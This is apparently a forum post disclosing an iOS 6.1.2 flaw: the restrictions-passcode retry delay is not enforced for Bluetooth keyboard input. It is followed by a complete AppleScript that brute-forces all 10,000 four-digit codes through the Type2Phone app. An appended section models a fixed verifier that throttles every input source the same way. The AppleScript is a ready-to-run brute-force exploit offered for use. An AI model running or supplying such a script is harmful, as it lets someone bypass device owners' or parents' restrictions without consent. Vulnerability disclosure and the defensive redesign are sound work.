Hi,
I've found a vulnerability in iOS 6.1.2 on an iPhone 4S (probably there in other versions and for other iPhones/iPads/iPod Touches) that will allow you to brute force the restrictions passcode. Explanation is on a video at http://www.youtube.com/watch?v=dgvIdIScG0c, below is some really simple AppleScript that I have written to exploit the vulnerability.
The gist of the solution is that iOS usually enforces a delay before re-entering a restrictions passcode after a number of failed attempts, but this is not enforced when using a Bluetooth keyboard.
Enjoy!
Code:
-- Author Chris Russell
-- This script is designed to brute force the restrictions passcode on iPhone
-- Assumptions:
-- Bluetooth is enabled
-- Type2Phone App is running and connected to your phone (avail on Mac App Store)
-- iPhone is switched on and on the restrictions passcode screen (General - Restrictions)

global pinCodeDigit1
global pinCodeDigit2
global pinCodeDigit3
global pinCodeDigit4

set pinCodeDigit1 to 0
set pinCodeDigit2 to 0
set pinCodeDigit3 to 0
set pinCodeDigit4 to 0

on keyStrokeNumber(num)
    if (num = 0) then
        tell application "System Events" to keystroke "0"
    else if (num = 1) then
        tell application "System Events" to keystroke "1"
    else if (num = 2) then
        tell application "System Events" to keystroke "2"
    else if (num = 3) then
        tell application "System Events" to keystroke "3"
    else if (num = 4) then
        tell application "System Events" to keystroke "4"
    else if (num = 5) then
        tell application "System Events" to keystroke "5"
    else if (num = 6) then
        tell application "System Events" to keystroke "6"
    else if (num = 7) then
        tell application "System Events" to keystroke "7"
    else if (num = 8) then
        tell application "System Events" to keystroke "8"
    else if (num = 9) then
        tell application "System Events" to keystroke "9"
    end if
end keyStrokeNumber

to incrementPIN()
    if (pinCodeDigit4 = 9) then
        if (pinCodeDigit3 = 9) then
            if (pinCodeDigit2 = 9) then
                set pinCodeDigit1 to pinCodeDigit1 + 1
                set pinCodeDigit2 to 0
                set pinCodeDigit3 to 0
                set pinCodeDigit4 to 0
            else
                set pinCodeDigit2 to pinCodeDigit2 + 1
                set pinCodeDigit3 to 0
                set pinCodeDigit4 to 0
            end if
        else
            set pinCodeDigit3 to pinCodeDigit3 + 1
            set pinCodeDigit4 to 0
        end if
    else
        set pinCodeDigit4 to pinCodeDigit4 + 1
    end if
end incrementPIN

to tryPin()
    keyStrokeNumber(pinCodeDigit1)
    keyStrokeNumber(pinCodeDigit2)
    keyStrokeNumber(pinCodeDigit3)
    keyStrokeNumber(pinCodeDigit4)
    delay 1
end tryPin

try
    «event ascrgdut»
end try

-- main application, simple ;)
tell application "Type2Phone" to activate
repeat 10000 times
    tryPin()
    incrementPIN()
end repeat
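Added example, not part of the original post and not Apple's code: a minimal model of the corrected design, where the failed-attempt delay is enforced inside the verification routine so that touch input and a Bluetooth keyboard hit the same throttle. The class name, the lockout schedule and the `source` parameter are assumptions made for illustration.

```python
import hashlib, hmac, os

# Assumed policy (not Apple's actual values): free attempts, then escalating lockouts.
FREE_ATTEMPTS = 5
LOCKOUT_SECONDS = [60, 300, 900, 3600]  # constructed schedule, last step repeats

class RestrictionsPasscode:
    """Hypothetical verifier: the throttle lives in verify(), not in the UI layer."""
    def __init__(self, pin, clock):
        self._salt = os.urandom(16)
        self._hash = self._derive(pin)
        self._clock = clock        # injectable time source so the policy is testable
        self._failures = 0         # a real device must persist this across reboots
        self._locked_until = 0.0

    def _derive(self, pin):
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), self._salt, 10_000)

    def verify(self, pin, source="touch"):
        """Return 'ok', 'wrong' or 'locked'; `source` never influences the throttle."""
        now = self._clock()
        if now < self._locked_until:
            return "locked"        # rejected before the PIN is even compared
        if hmac.compare_digest(self._derive(pin), self._hash):
            self._failures = 0
            return "ok"
        self._failures += 1
        over = self._failures - FREE_ATTEMPTS
        if over >= 0:
            step = min(over, len(LOCKOUT_SECONDS) - 1)
            self._locked_until = now + LOCKOUT_SECONDS[step]
        return "wrong"

def worst_case_seconds(keyspace=10_000, per_try=1.0):
    """Time to walk the full 4-digit keyspace when every lockout must be waited out."""
    total, failures = 0.0, 0
    for _ in range(keyspace):
        total += per_try
        failures += 1
        over = failures - FREE_ATTEMPTS
        if over >= 0:
            total += LOCKOUT_SECONDS[min(over, len(LOCKOUT_SECONDS) - 1)]
    return total
```

With no delay enforced, the script's one guess per second covers all 10000 codes in under three hours; under this assumed schedule the same walk takes over a year.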